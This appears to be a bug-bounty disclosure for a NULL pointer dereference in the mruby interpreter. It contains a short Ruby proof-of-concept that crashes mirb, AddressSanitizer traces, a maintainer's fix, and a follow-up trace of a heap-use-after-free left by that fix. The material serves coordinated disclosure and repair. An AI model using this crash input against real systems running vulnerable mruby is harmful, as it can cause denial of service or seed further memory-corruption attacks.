NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Dec 10th 2021


Description

NULL Pointer Dereference in mrb_full_gc

Proof of Concept

( *a = () )
a.<<.take_while{ a.drop_while {Enumerable ; a<<lambda {}}}

Result

./master/asan_mruby/bin/mirb ./crash.rb
mirb - Embeddable Interactive Ruby Shell

 => nil
AddressSanitizer:DEADLYSIGNAL
=================================================================
==21352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556b44382444 bp 0x7fff4e9961d0 sp 0x7fff4e9961b0 T0)
==21352==The signal is caused by a READ memory access.
==21352==Hint: address points to the zero page.
    #0 0x556b44382443 in mrb_full_gc /root/master/asan_mruby/src/gc.c:1317
    #1 0x556b4438276b in mrb_garbage_collect /root/master/asan_mruby/src/gc.c:1350
    #2 0x556b44386737 in mrb_irep_incref /root/master/asan_mruby/src/state.c:114
    #3 0x556b4444780a in mrb_proc_copy /root/master/asan_mruby/src/proc.c:213
    #4 0x556b44448162 in proc_lambda /root/master/asan_mruby/src/proc.c:284
    #5 0x556b4439f98c in mrb_vm_exec /root/master/asan_mruby/src/vm.c:1637
    #6 0x556b44391018 in mrb_vm_run /root/master/asan_mruby/src/vm.c:1091
    #7 0x556b443034eb in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:670
    #8 0x7f192ee230b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #9 0x556b4430048d in _start (/root/master/asan_mruby/bin/mirb+0xbe48d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/master/asan_mruby/src/gc.c:1317 in mrb_full_gc
==21352==ABORTING
We are processing your report and will contact the mruby team within 24 hours. 5 months ago
We have contacted a member of the mruby team and are waiting to hear back 5 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 5 months ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on f5e10c 5 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
felling
5 months ago

Researcher


Hi @Matz, looks like your fix is incomplete.

mruby/bin/mirb test.rb
mirb - Embeddable Interactive Ruby Shell

 => nil
too many irep references (RuntimeError)
=================================================================
==4326==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a6 at pc 0x555880ee8b49 bp 0x7ffd45311cb0 sp 0x7ffd45311ca0
READ of size 1 at 0x6070000003a6 thread T0
    #0 0x555880ee8b48 in mrb_irep_cutref /root/master/asan_mruby/src/state.c:138
    #1 0x555880ee2170 in obj_free /root/master/asan_mruby/src/gc.c:871
    #2 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
    #3 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
    #4 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
    #5 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
    #6 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #7 0x555880e6248d in _start (/root/master/asan_mruby/bin/mirb+0xbf48d)

0x6070000003a6 is located 6 bytes inside of 72-byte region [0x6070000003a0,0x6070000003e8)
freed by thread T0 here:
    #0 0x7fa03caf47cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
    #1 0x555880ee87a3 in mrb_default_allocf /root/master/asan_mruby/src/state.c:64
    #2 0x555880edeb69 in mrb_free /root/master/asan_mruby/src/gc.c:288
    #3 0x555880ee9198 in mrb_irep_free /root/master/asan_mruby/src/state.c:174
    #4 0x555880ee8af7 in mrb_irep_decref /root/master/asan_mruby/src/state.c:128
    #5 0x555880ee2183 in obj_free /root/master/asan_mruby/src/gc.c:873
    #6 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
    #7 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
    #8 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
    #9 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
    #10 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

previously allocated by thread T0 here:
    #0 0x7fa03caf4ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe)
    #1 0x555880ee87bd in mrb_default_allocf /root/master/asan_mruby/src/state.c:68
    #2 0x555880ede83e in mrb_realloc_simple /root/master/asan_mruby/src/gc.c:226
    #3 0x555880ede940 in mrb_realloc /root/master/asan_mruby/src/gc.c:240
    #4 0x555880edea2d in mrb_malloc /root/master/asan_mruby/src/gc.c:256
    #5 0x555880ee931a in mrb_add_irep /root/master/asan_mruby/src/state.c:208
    #6 0x555880f69f00 in scope_add_irep /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3641
    #7 0x555880f6a361 in scope_new /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3671
    #8 0x555880f592b8 in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1294
    #9 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #10 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #11 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #12 0x555880f5b006 in gen_values /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1563
    #13 0x555880f5ba5c in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1668
    #14 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #15 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #16 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
    #17 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #18 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #19 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #20 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #21 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
    #22 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #23 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #24 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #25 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #26 0x555880f5a801 in scope_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1473
    #27 0x555880f612ae in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2494
    #28 0x555880f6c43d in generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3888
    #29 0x555880f6c815 in mrb_generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3911

SUMMARY: AddressSanitizer: heap-use-after-free /root/master/asan_mruby/src/state.c:138 in mrb_irep_cutref
Shadow bytes around the buggy address:
  0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fd fd
  0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
  0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
  0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0e7fff8060: fd fa fa fa fa fa fd fd fd fd fd fd fd fd fd fa
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
  0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4326==ABORTING
Robert Scott
a month ago

@matz can confirm this is still not fixed in 3.1.0-rc2

Robert Scott
a month ago

^ Disregard this. What presumably happened is the follow-up to this became https://huntr.dev/bounties/59a70392-4864-4ce3-8e35-6ac2111d1e2e/